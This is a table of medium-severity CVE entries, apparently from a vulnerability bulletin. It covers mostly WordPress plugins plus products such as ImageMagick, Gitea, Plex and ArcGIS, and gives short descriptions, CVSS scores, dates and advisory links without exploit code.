| ViitorCloud Technologies Pvt Ltd--Add Featured Image Custom Link | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ViitorCloud Technologies Pvt Ltd Add Featured Image Custom Link allows DOM-Based XSS. This issue affects Add Featured Image Custom Link: from n/a through 2.0.0. | 2025-12-31 | 5.9 | CVE-2025-62119 | https://vdp.patchstack.com/database/wordpress/plugin/custom-url-to-featured-image/vulnerability/wordpress-add-featured-image-custom-link-plugin-2-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Rick Beckman--OpenHook | Cross-Site Request Forgery (CSRF) vulnerability in Rick Beckman OpenHook allows Cross Site Request Forgery. This issue affects OpenHook: from n/a through 4.3.1. | 2025-12-31 | 5.4 | CVE-2025-62120 | https://vdp.patchstack.com/database/wordpress/plugin/thesis-openhook/vulnerability/wordpress-openhook-plugin-4-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Imran Emu--Logo Slider, Logo Carousel, Logo showcase, Client Logo | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Imran Emu Logo Slider, Logo Carousel, Logo showcase, Client Logo allows Stored XSS. This issue affects Logo Slider, Logo Carousel, Logo showcase, Client Logo: from n/a through 1.8.1. | 2025-12-31 | 5.9 | CVE-2025-62121 | https://vdp.patchstack.com/database/wordpress/plugin/tc-logo-slider/vulnerability/wordpress-logo-slider-logo-carousel-logo-showcase-client-logo-plugin-1-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Solwininfotech--Trash Duplicate and 301 Redirect | Missing Authorization vulnerability in Solwininfotech Trash Duplicate and 301 Redirect allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Trash Duplicate and 301 Redirect: from n/a through 1.9.1. | 2025-12-31 | 5.3 | CVE-2025-62122 | https://vdp.patchstack.com/database/wordpress/plugin/trash-duplicate-and-301-redirect/vulnerability/wordpress-trash-duplicate-and-301-redirect-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve |
| Soli--WP Post Signature | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Soli WP Post Signature allows Stored XSS. This issue affects WP Post Signature: from n/a through 0.4.1. | 2025-12-31 | 5.9 | CVE-2025-62124 | https://vdp.patchstack.com/database/wordpress/plugin/wp-post-signature/vulnerability/wordpress-wp-post-signature-plugin-0-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Razvan Stanga--Varnish/Nginx Proxy Caching | Insertion of Sensitive Information Into Sent Data vulnerability in Razvan Stanga Varnish/Nginx Proxy Caching allows Retrieve Embedded Sensitive Data. This issue affects Varnish/Nginx Proxy Caching: from n/a through 1.8.3. | 2025-12-31 | 5.3 | CVE-2025-62126 | https://vdp.patchstack.com/database/wordpress/plugin/vcaching/vulnerability/wordpress-varnish-nginx-proxy-caching-plugin-1-8-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Magnigenie--RestroPress | Missing Authorization vulnerability in Magnigenie RestroPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RestroPress: from n/a through 3.2.4.2. | 2025-12-31 | 5.3 | CVE-2025-62129 | https://vdp.patchstack.com/database/wordpress/plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-4-2-broken-access-control-vulnerability?_s_id=cve |
| A WP Life--Contact Form Widget | Cross-Site Request Forgery (CSRF) vulnerability in A WP Life Contact Form Widget allows Cross Site Request Forgery. This issue affects Contact Form Widget: from n/a through 1.5.1. | 2025-12-31 | 5.4 | CVE-2025-62134 | https://vdp.patchstack.com/database/wordpress/plugin/new-contact-form-widget/vulnerability/wordpress-contact-form-widget-plugin-1-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| CedCommerce--WP Advanced PDF | Missing Authorization vulnerability in CedCommerce WP Advanced PDF allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Advanced PDF: from n/a through 1.1.7. | 2025-12-31 | 5.3 | CVE-2025-62138 | https://vdp.patchstack.com/database/wordpress/plugin/wp-advanced-pdf/vulnerability/wordpress-wp-advanced-pdf-plugin-1-1-7-other-vulnerability-type-vulnerability?_s_id=cve |
| Vladimir Statsenko--Terms descriptions | Insertion of Sensitive Information Into Sent Data vulnerability in Vladimir Statsenko Terms descriptions allows Retrieve Embedded Sensitive Data. This issue affects Terms descriptions: from n/a through 3.4.9. | 2025-12-31 | 5.3 | CVE-2025-62139 | https://vdp.patchstack.com/database/wordpress/plugin/terms-descriptions/vulnerability/wordpress-terms-descriptions-plugin-3-4-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| Plainware--Locatoraid Store Locator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Plainware Locatoraid Store Locator allows Stored XSS. This issue affects Locatoraid Store Locator: from n/a through 3.9.65. | 2025-12-31 | 5.9 | CVE-2025-62140 | https://vdp.patchstack.com/database/wordpress/plugin/locatoraid/vulnerability/wordpress-locatoraid-store-locator-plugin-3-9-65-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 101gen--Wawp | Missing Authorization vulnerability in 101gen Wawp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wawp: from n/a through 4.0.5. | 2025-12-31 | 5.3 | CVE-2025-62141 | https://vdp.patchstack.com/database/wordpress/plugin/automation-web-platform/vulnerability/wordpress-wawp-plugin-4-0-5-broken-access-control-vulnerability?_s_id=cve |
| nicashmu--Cincopa video and media plug-in | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nicashmu Cincopa video and media plug-in allows Stored XSS. This issue affects Cincopa video and media plug-in: from n/a through 1.163. | 2025-12-31 | 5.9 | CVE-2025-62142 | https://vdp.patchstack.com/database/wordpress/plugin/video-playlist-and-gallery-plugin/vulnerability/wordpress-post-video-players-plugin-1-163-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Mohammed Kaludi--Core Web Vitals & PageSpeed Booster | Missing Authorization vulnerability in Mohammed Kaludi Core Web Vitals & PageSpeed Booster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.27. | 2025-12-31 | 5.4 | CVE-2025-62144 | https://vdp.patchstack.com/database/wordpress/plugin/core-web-vitals-pagespeed-booster/vulnerability/wordpress-core-web-vitals-pagespeed-booster-plugin-1-0-27-broken-access-control-vulnerability?_s_id=cve |
| NewClarity--DMCA Protection Badge | Missing Authorization vulnerability in NewClarity DMCA Protection Badge allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects DMCA Protection Badge: from n/a through 2.2.0. | 2025-12-31 | 5.3 | CVE-2025-62145 | https://vdp.patchstack.com/database/wordpress/plugin/dmca-badge/vulnerability/wordpress-dmca-protection-badge-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve |
| Nik Melnik--Realbig | Missing Authorization vulnerability in Nik Melnik Realbig allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Realbig: from n/a through 1.1.3. | 2025-12-31 | 5.3 | CVE-2025-62147 | https://vdp.patchstack.com/database/wordpress/plugin/realbig-media/vulnerability/wordpress-realbig-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve |
| SaifuMak--Add Custom Codes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SaifuMak Add Custom Codes allows Stored XSS. This issue affects Add Custom Codes: from n/a through 4.80. | 2025-12-31 | 5.9 | CVE-2025-62149 | https://vdp.patchstack.com/database/wordpress/plugin/add-custom-codes/vulnerability/wordpress-add-custom-codes-plugin-4-80-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Aum Watcharapon--Featured Image Generator | Missing Authorization vulnerability in Aum Watcharapon Featured Image Generator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Featured Image Generator: from n/a through 1.3.3. | 2025-12-31 | 5.3 | CVE-2025-62747 | https://vdp.patchstack.com/database/wordpress/plugin/featured-image-generator/vulnerability/wordpress-featured-image-generator-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve |
| Filipe Seabra--WooCommerce Parcelas | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Filipe Seabra WooCommerce Parcelas allows DOM-Based XSS. This issue affects WooCommerce Parcelas: from n/a through 1.3.5. | 2025-12-31 | 5.9 | CVE-2025-62750 | https://vdp.patchstack.com/database/wordpress/plugin/woocommerce-parcelas/vulnerability/wordpress-woocommerce-parcelas-plugin-1-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| GS Plugins--GS Portfolio for Envato | Unauthenticated broken access control in GS Portfolio for Envato versions <= 1.4.2. | 2025-12-31 | 5.3 | CVE-2025-62755 | https://vdp.patchstack.com/database/wordpress/plugin/gs-envato-portfolio/vulnerability/wordpress-gs-portfolio-for-envato-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve |
| Marco Milesi--WP Attachments | Missing Authorization vulnerability in Marco Milesi WP Attachments allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Attachments: from n/a through 5.2. | 2025-12-31 | 5.4 | CVE-2025-62888 | https://vdp.patchstack.com/database/wordpress/plugin/wp-attachments/vulnerability/wordpress-wp-attachments-plugin-5-2-broken-access-control-vulnerability?_s_id=cve |
| Boxy Studio--Cooked | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boxy Studio Cooked allows Stored XSS. This issue affects Cooked: from n/a through 1.11.2. | 2025-12-31 | 5.9 | CVE-2025-62989 | https://vdp.patchstack.com/database/wordpress/plugin/cooked/vulnerability/wordpress-cooked-plugin-1-11-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| nicdark--Hotel Booking | Missing Authorization vulnerability in nicdark Hotel Booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hotel Booking: from n/a through 3.8. | 2025-12-31 | 5.3 | CVE-2025-63001 | https://vdp.patchstack.com/database/wordpress/plugin/nd-booking/vulnerability/wordpress-hotel-booking-plugin-3-8-broken-access-control-vulnerability?_s_id=cve |
| Quadlayers--QuadLayers TikTok Feed | Missing Authorization vulnerability in Quadlayers QuadLayers TikTok Feed allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects QuadLayers TikTok Feed: from n/a through 4.6.4. | 2025-12-31 | 5.3 | CVE-2025-63016 | https://vdp.patchstack.com/database/wordpress/plugin/wp-tiktok-feed/vulnerability/wordpress-quadlayers-tiktok-feed-plugin-4-6-4-broken-access-control-vulnerability?_s_id=cve |
| Illia--Simple Like Page | Missing Authorization vulnerability in Illia Simple Like Page allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple Like Page: from n/a through 1.5.3. | 2025-12-31 | 5.3 | CVE-2025-63022 | https://vdp.patchstack.com/database/wordpress/plugin/simple-facebook-plugin/vulnerability/wordpress-simple-like-page-plugin-1-5-3-broken-access-control-vulnerability?_s_id=cve |
| WP Grids--EasyTest | Missing Authorization vulnerability in WP Grids EasyTest allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EasyTest: from n/a through 1.0.1. | 2025-12-31 | 5.3 | CVE-2025-63031 | https://vdp.patchstack.com/database/wordpress/plugin/convertpro/vulnerability/wordpress-easytest-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| Jewel Theme--Master Addons for Elementor | Authorization Bypass Through User-Controlled Key vulnerability in Jewel Theme Master Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Master Addons for Elementor: from n/a through 2.0.9.9.4. | 2025-12-31 | 5.3 | CVE-2025-63053 | https://vdp.patchstack.com/database/wordpress/plugin/master-addons/vulnerability/wordpress-master-addons-for-elementor-plugin-2-0-9-9-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WP Legal Pages--WP Cookie Notice for GDPR, CCPA & ePrivacy Consent | Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through 4.0.3. | 2025-12-30 | 5.3 | CVE-2025-66080 | https://vdp.patchstack.com/database/wordpress/plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-3-broken-access-control-vulnerability-2?_s_id=cve |
| merkulove--Worker for Elementor | Missing Authorization vulnerability in merkulove Worker for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Worker for Elementor: from n/a through 1.0.10. | 2025-12-31 | 5.4 | CVE-2025-66144 | https://vdp.patchstack.com/database/wordpress/plugin/worker-elementor/vulnerability/wordpress-worker-for-elementor-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Worker for WPBakery | Missing Authorization vulnerability in merkulove Worker for WPBakery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Worker for WPBakery: from n/a through 1.1.1. | 2025-12-31 | 5.4 | CVE-2025-66145 | https://vdp.patchstack.com/database/wordpress/plugin/worker-wpbakery/vulnerability/wordpress-worker-for-wpbakery-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Logger for Elementor | Missing Authorization vulnerability in merkulove Logger for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Logger for Elementor: from n/a through 1.0.9. | 2025-12-31 | 5.4 | CVE-2025-66146 | https://vdp.patchstack.com/database/wordpress/plugin/logger-elementor/vulnerability/wordpress-logger-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Conformer for Elementor | Missing Authorization vulnerability in merkulove Conformer for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Conformer for Elementor: from n/a through 1.0.7. | 2025-12-31 | 5.4 | CVE-2025-66148 | https://vdp.patchstack.com/database/wordpress/plugin/conformer-elementor/vulnerability/wordpress-conformer-for-elementor-plugin-1-0-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--UnGrabber | Missing Authorization vulnerability in merkulove UnGrabber allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects UnGrabber: from n/a through 3.1.3. | 2025-12-31 | 5.4 | CVE-2025-66149 | https://vdp.patchstack.com/database/wordpress/plugin/ungrabber/vulnerability/wordpress-ungrabber-plugin-3-1-3-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Appender | Missing Authorization vulnerability in merkulove Appender allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Appender: from n/a through 1.1.1. | 2025-12-31 | 5.4 | CVE-2025-66150 | https://vdp.patchstack.com/database/wordpress/plugin/appender/vulnerability/wordpress-appender-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Countdowner for Elementor | Missing Authorization vulnerability in merkulove Countdowner for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Countdowner for Elementor: from n/a through 1.0.4. | 2025-12-31 | 5.4 | CVE-2025-66151 | https://vdp.patchstack.com/database/wordpress/plugin/countdowner-elementor/vulnerability/wordpress-countdowner-for-elementor-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Criptopayer for Elementor | Missing Authorization vulnerability in merkulove Criptopayer for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Criptopayer for Elementor: from n/a through 1.0.1. | 2025-12-31 | 5.4 | CVE-2025-66152 | https://vdp.patchstack.com/database/wordpress/plugin/criptopayer-elementor/vulnerability/wordpress-criptopayer-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Headinger for Elementor | Missing Authorization vulnerability in merkulove Headinger for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Headinger for Elementor: from n/a through 1.1.4. | 2025-12-31 | 5.4 | CVE-2025-66153 | https://vdp.patchstack.com/database/wordpress/plugin/headinger-elementor/vulnerability/wordpress-headinger-for-elementor-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Couponer for Elementor | Missing Authorization vulnerability in merkulove Couponer for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Couponer for Elementor: from n/a through 1.1.7. | 2025-12-31 | 5.4 | CVE-2025-66154 | https://vdp.patchstack.com/database/wordpress/plugin/couponer-elementor/vulnerability/wordpress-couponer-for-elementor-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Questionar for Elementor | Missing Authorization vulnerability in merkulove Questionar for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Questionar for Elementor: from n/a through 1.1.7. | 2025-12-31 | 5.4 | CVE-2025-66155 | https://vdp.patchstack.com/database/wordpress/plugin/questionar-elementor/vulnerability/wordpress-questionar-for-elementor-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Watcher for Elementor | Missing Authorization vulnerability in merkulove Watcher for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Watcher for Elementor: from n/a through 1.0.9. | 2025-12-31 | 5.4 | CVE-2025-66156 | https://vdp.patchstack.com/database/wordpress/plugin/watcher-elementor/vulnerability/wordpress-watcher-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Slider for Elementor | Missing Authorization vulnerability in merkulove Slider for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slider for Elementor: from n/a through 1.0.10. | 2025-12-31 | 5.4 | CVE-2025-66157 | https://vdp.patchstack.com/database/wordpress/plugin/sliper-elementor/vulnerability/wordpress-sliper-for-elementor-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Gmaper for Elementor | Missing Authorization vulnerability in merkulove Gmaper for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gmaper for Elementor: from n/a through 1.0.9. | 2025-12-31 | 5.4 | CVE-2025-66158 | https://vdp.patchstack.com/database/wordpress/plugin/gmaper-elementor/vulnerability/wordpress-gmaper-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Walker for Elementor | Missing Authorization vulnerability in merkulove Walker for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Walker for Elementor: from n/a through 1.1.6. | 2025-12-31 | 5.4 | CVE-2025-66159 | https://vdp.patchstack.com/database/wordpress/plugin/walker-elementor/vulnerability/wordpress-walker-for-elementor-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Select Graphist for Elementor Graphist for Elementor | Missing Authorization vulnerability in merkulove Select Graphist for Elementor Graphist for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Select Graphist for Elementor Graphist for Elementor: from n/a through 1.2.10. | 2025-12-31 | 5.4 | CVE-2025-66160 | https://vdp.patchstack.com/database/wordpress/plugin/graphist-elementor/vulnerability/wordpress-select-graphist-for-elementor-graphist-for-elementor-plugin-1-2-10-broken-access-control-vulnerability?_s_id=cve |
| Esri--ArcGIS Server | ArcGIS Server version 11.5 and earlier on Windows and Linux does not properly validate uploaded files, which allows remote attackers to upload arbitrary files. | 2025-12-31 | 5.6 | CVE-2025-67706 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | ArcGIS Server version 11.5 and earlier on Windows and Linux does not properly validate uploaded files, which allows remote attackers to upload arbitrary files. | 2025-12-31 | 5.6 | CVE-2025-67707 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. An unauthenticated information disclosure vulnerability in versions prior to 2.19.0 allows any user to retrieve sensitive system information, including the full SignalK data schema, connected serial devices, and installed analyzer tools. This exposure facilitates reconnaissance for further attacks. Version 2.19.0 patches the issue. | 2026-01-01 | 5.3 | CVE-2025-68273 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, using Magick to read a malicious SVG file resulted in a DoS attack. Version 7.1.2-12 fixes the issue. | 2025-12-30 | 5.3 | CVE-2025-68618 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637 https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb |
| frappe--crm | Frappe CRM is an open-source customer relationship management tool. Prior to version 1.56.2, authenticated users could set crafted URLs in a website field, which were not sanitized, causing cross-site scripting. Version 1.56.2 fixes the issue. No known workarounds are available. | 2025-12-29 | 5.4 | CVE-2025-68928 | https://github.com/frappe/crm/security/advisories/GHSA-fm34-v6j7-chwc https://github.com/frappe/crm/commit/c5766d9989131d17d954e866bfc4b8d3b23e4f10 https://github.com/frappe/crm/releases/tag/v1.56.2 |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Versions 4.0.14 and 4.0.15 have a stored cross-site scripting (XSS) vulnerability that allows an attacker to execute arbitrary JavaScript in an administrator's browser by registering a user whose display name contains HTML entities. When an administrator views the admin user list, the payload is decoded server-side and rendered without escaping, resulting in script execution in the admin context. Version 4.0.16 contains a patch for the issue. | 2025-12-29 | 5.4 | CVE-2025-68951 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-jv8r-hv7q-p6vc https://github.com/thorsten/phpMyFAQ/commit/61829e83411f7b28bc6fd1052bfde54c32c6c370 https://github.com/thorsten/phpMyFAQ/commit/8211d1d25951b4c272443cfc3ef9c09b1363fd87 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, in the WriteSVGImage function, using an int variable to store number_attributes caused an integer overflow. This, in turn, triggered a buffer overflow and caused a DoS attack. Version 7.1.2-12 fixes the issue. | 2025-12-30 | 5.3 | CVE-2025-69204 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e |
| Gitea--Gitea | In Gitea before 1.25.2, /api/v1/user has different responses for failed authentication depending on whether a username exists. | 2026-01-01 | 5.3 | CVE-2025-69413 | https://blog.gitea.com/release-of-1.25.2/ https://github.com/go-gitea/gitea/releases/tag/v1.25.2 https://github.com/go-gitea/gitea/issues/35984 https://github.com/go-gitea/gitea/pull/36002 |
| Plex--plex.tv backend | In the plex.tv backend for Plex Media Server (PMS) through 2025-12-31, a non-server device token can retrieve other tokens (intended for unrelated access) via clients.plex.tv/devices.xml. | 2026-01-02 | 5 | CVE-2025-69416 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| Plex--plex.tv backend | In the plex.tv backend for Plex Media Server (PMS) through 2025-12-31, a non-server device token can retrieve share tokens (intended for unrelated access) via a shared_servers endpoint. | 2026-01-02 | 5 | CVE-2025-69417 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| stefanberger--libtpms | libtpms, a library that provides software emulation of a Trusted Platform Module, has a flaw in versions 0.10.0 and 0.10.1. The commonly used integration of libtpms with OpenSSL 3.x contained a vulnerability related to the returned IV (initialization vector) when certain symmetric ciphers were used. Instead of returning the last IV it returned the initial IV to the caller, thus weakening the subsequent encryption and decryption steps. The highest threat from this vulnerability is to data confidentiality. Version 0.10.2 fixes the issue. No known workarounds are available. | 2026-01-02 | 5.5 | CVE-2026-21444 | https://github.com/stefanberger/libtpms/security/advisories/GHSA-7jxr-4j3g-p34f https://github.com/stefanberger/libtpms/issues/541 https://github.com/stefanberger/libtpms/commit/33c9ff074cb16c1841ce7d7f33643c17c426743a |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, thereby enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue. | 2026-01-03 | 5.3 | CVE-2026-21484 | https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch https://github.com/Mintplex-Labs/anything-llm/commit/e287fab56089cf8fcea9ba579a3ecdeca0daa313 |
| JM-DATA ONU--JF511-TV | JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to authenticated stored cross-site scripting (XSS) attacks, allowing attackers with authenticated access to inject malicious scripts that will be executed in other users' browsers when they view the affected content. | 2025-12-30 | 4.3 | CVE-2022-50801 | Zero Science Lab Disclosure (ZSL-2022-5708) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Entry JM-DATA Vendor Homepage VulnCheck Advisory: JM-DATA ONU JF511-TV 1.0.67 Authenticated Stored Cross-Site Scripting (XSS) Vulnerability |
| PKrystian--Full-Stack-Bank | A vulnerability was detected in PKrystian Full-Stack-Bank up to bf73a0179e3ff07c0d7dc35297cea0be0e5b1317. This vulnerability affects unknown code of the component User Handler. Performing manipulation results in sql injection. It is possible to initiate the attack remotely. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The patch is named 25c9965a872c704f3a9475488dc5d3196902199a. It is suggested to install a patch to address this issue. | 2025-12-31 | 4.7 | CVE-2023-7331 | VDB-338650 \| PKrystian Full-Stack-Bank User sql injection VDB-338650 \| CTI Indicators (IOB, IOC, TTP) https://github.com/PKrystian/Full-Stack-Bank/pull/21 https://github.com/PKrystian/Full-Stack-Bank/commit/25c9965a872c704f3a9475488dc5d3196902199a |
| wpchill--Strong Testimonials | The Strong Testimonials plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'edit_rating' function in all versions up to, and including, 3.2.18. This makes it possible for authenticated attackers with Contributor-level access and above to modify or delete the rating meta on any testimonial post, including those created by other users, by reusing a valid nonce obtained from their own testimonial edit screen. | 2025-12-30 | 4.3 | CVE-2025-14426 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c83f48dd-9070-412d-b911-98581a81e29a?source=cve https://plugins.trac.wordpress.org/browser/strong-testimonials/tags/3.2.18/admin/class-strong-testimonials-post-editor.php#L379 https://plugins.trac.wordpress.org/browser/strong-testimonials/tags/3.2.18/admin/class-strong-testimonials-post-editor.php#L29 https://plugins.trac.wordpress.org/changeset/3416480/ |
| galdub--All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs My Sticky Elements | The All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs - My Sticky Elements plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the 'my_sticky_elements_bulks' function in all versions up to, and including, 2.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all contact form leads stored by the plugin. | 2026-01-01 | 4.3 | CVE-2025-14428 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b82ce74-11ac-4719-961d-a16717ce023b?source=cve https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-admin.php#L29 https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-admin.php#L1788 https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-front.php#L121 https://plugins.trac.wordpress.org/changeset/3423407/ |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy | The Easy Digital Downloads plugin for WordPress is vulnerable to Unvalidated Redirect in all versions up to, and including, 3.6.2. This is due to insufficient validation on the redirect url supplied via the 'edd_redirect' parameter. This makes it possible for unauthenticated attackers to redirect users with the password reset email to potentially malicious sites if they can successfully trick them into performing an action. | 2025-12-31 | 4.3 | CVE-2025-14783 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c0fb43c-f576-412e-a144-4725356ed9a0?source=cve https://plugins.trac.wordpress.org/browser/easy-digital-downloads/trunk/includes/users/lost-password.php#L187 https://plugins.trac.wordpress.org/browser/easy-digital-downloads/trunk/includes/blocks/views/forms/lost-password.php#L24 https://plugins.trac.wordpress.org/changeset/3426524/easy-digital-downloads/trunk/includes/users/lost-password.php |
| JFrog--Artifactory (Workers) | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JFrog Artifactory (Workers) allows Cross-Site Scripting (XSS). This issue affects Artifactory (Workers): from >=7.94.0 through <7.117.10. | 2026-01-04 | 4.9 | CVE-2025-14830 | https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories |
| BiggiDroid--Simple PHP CMS | A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected by this issue is some unknown functionality of the file /admin/editsite.php. Executing manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-29 | 4.7 | CVE-2025-15169 | VDB-338549 \| BiggiDroid Simple PHP CMS editsite.php sql injection VDB-338549 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708845 \| BiggiDroid Simple PHP CMS BiggiDroid 1.0 SQL Injection https://gitee.com/sun-huizhi/dazhi/issues/IDBDAY |
| Advaya Softech--GEMS ERP Portal | A security vulnerability has been detected in Advaya Softech GEMS ERP Portal up to 2.1. This affects an unknown part of the file /home.jsp?isError=true of the component Error Message Handler. The manipulation of the argument Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-29 | 4.3 | CVE-2025-15170 | VDB-338550 \| Advaya Softech GEMS ERP Portal Error Message home.jsp cross site scripting VDB-338550 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #717590 \| Advaya Softech GEMS ERP Portal 2.1 Cross Site Scripting https://syansec.in/video_poc/cve_2025.mp4 |
